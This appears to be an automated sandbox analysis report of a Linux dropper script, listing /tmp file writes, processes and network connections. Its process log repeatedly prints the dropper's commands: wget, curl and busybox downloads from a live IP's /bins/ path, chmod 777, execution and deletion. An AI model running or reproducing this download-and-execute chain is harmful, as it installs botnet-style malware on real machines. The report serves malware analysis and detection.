| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
Processes
/tmp/01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh
[/tmp/01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/wget
[wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 151.101.129.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 89.187.167.2:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
